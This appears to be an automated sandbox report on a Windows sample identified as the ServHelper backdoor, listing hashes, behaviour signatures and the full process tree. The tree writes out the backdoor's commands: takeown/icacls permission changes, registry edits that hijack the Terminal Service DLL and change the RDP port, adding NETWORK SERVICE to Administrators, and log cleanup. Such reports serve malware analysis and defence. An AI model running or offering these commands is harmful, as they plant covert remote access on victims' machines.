Analysis
-
max time kernel
180s -
max time network
160s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
22-12-2023 13:53
General
-
Target
b0c3c2a0596614eeb982676f23b2b3c2.exe
-
Size
4.2MB
-
MD5
b0c3c2a0596614eeb982676f23b2b3c2
-
SHA1
4fd90dccbb3d603c522b5a3ed172004131f45413
-
SHA256
c2add78326f26be631d5cf21ff3ca5e5393b090adb1dc7b11a14f29a00818ac2
-
SHA512
3a5cb95b6ed274debd2ec711f58d1ae647b8725aa86c63b8181accc48bc26cb2311ca62cd5dabc0906c3daf4866cb861fae6ff1e054f2ad94b237bc5d7391a44
-
SSDEEP
98304:KI6X9OmbHlT6U1FGbJqj2OCuaIGbFAUqxdijH8tk8vp8K:jmbN6kEJqjGu7iFoxk8+
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 2 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\b0c3c2a0596614eeb982676f23b2b3c2.exe"C:\Users\Admin\AppData\Local\Temp\b0c3c2a0596614eeb982676f23b2b3c2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tpm5udef\tpm5udef.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E03.tmp" "c:\Users\Admin\AppData\Local\Temp\tpm5udef\CSCE6FC0BCE3D7542F7A44921C62AF629.TMP"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
45KB
MD50aa395b27f460ce518edfe2f1c24c8fa
SHA1282350fe0c3fb8da5cc36cba9c2593a1434f20f7
SHA25694d5ed09585222e859c7d08f6fcc8a78e1c8ad6a2de473dd8b8ef33216594ef1
SHA512ec77d45e7a44f4b8c844bde24389cec9702c173bd672090a69d1a312a793046af3bb0398bd5d6cccc068a603e496bf7795748b6706441c2d54b096950c284df9
-
Filesize
1KB
MD52a69173cd2683415027ecdb4aad49124
SHA15efe1e152e8023d9fdc0e3221568bd30e3eeaf3c
SHA25616c875a944178652de30188f77fbf951278b7275b677bc37f32bab436a5dce2f
SHA512f73e6ed769f8033b98453ae4d3a07a19f0536d08e0dd0275ac0511505955a3ba9370e2cc092e15b775da7a95283dba1709d1affdf8b20c3cd791a17cade11883
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
266KB
MD5b2f95f4c8d5e6aff2f3ac33c73cf45a8
SHA1b1988b2c6dfffecfdec1d778992948bbfa250f2b
SHA25662d5570d481ce7bf2b1d280c0c38614efce5fa3f6cc4b15b8c56a8a295828c97
SHA51269539cefa9bd209d336b87ca57755ed458750b5526f830a6af35284373d623fdcdafd24ea2c85181cc6ce210d49d5ff73f339460f792f2efee6280b5001464eb
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
Filesize
3KB
MD59f69db413161789b9fd735ad4289e7af
SHA1e2b5e16897e9077e8ca9f93e071df9bed7831909
SHA256bb0f7be96b6f9067a683a5abdb9bf3178019bc7299b1ca886348efbd2d311866
SHA512e0aa83e19a5b7cbba5cd838e177d159724971868a62f08e5f8401172ebfb690105f9a22967cb1063614626601d60948403f0da577749bfa6a16200c8492ebd24
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD555316a5b790e192877f99213fb80ca1b
SHA197244622d3f50670cd0dc079e1e5a9119742e649
SHA256044507014cb3b1d7f164e876bdce3006b7ffe5f2879615563c02db5a8624a47d
SHA51240e6a24b2657a73cdad2e41f8a42329a83882ea01dc8d07edf1abe6f4415327ca05017a000aed40320b2e7d2718d8ba5ca50c5059fab9a140d2df47a51a49dcc
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
369B
MD5cbb48c771650f82e2c26c7b0feae95ba
SHA1a67baf71507c1ac4c0efb73923a4f0140723bd24
SHA256a1f73274322ea6dcc7737fdad6ba2e02e9f4ef8bce16d6347b183bbf6931939b
SHA5128c897193abd39e280be28ae88f4456c88f238a6996e53ded372430b83935f953fae3ae4f6739c26b38fab29cf537b3f1a4a64a71d10b12afc17121ed23aead2c
-
Filesize
584KB
-
Filesize
4.1MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
408KB
-
Filesize
43.3MB
-
Filesize
64KB
-
Filesize
5.6MB
-
Filesize
40KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
4.0MB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
4.1MB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
176KB
-
Filesize
6.5MB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
72KB
-
Filesize
3.3MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
68KB
-
Filesize
32KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
80KB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
56KB
-
Filesize
104KB
-
Filesize
120KB
-
Filesize
600KB
-
Filesize
40KB
-
Filesize
652KB
-
Filesize
200KB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB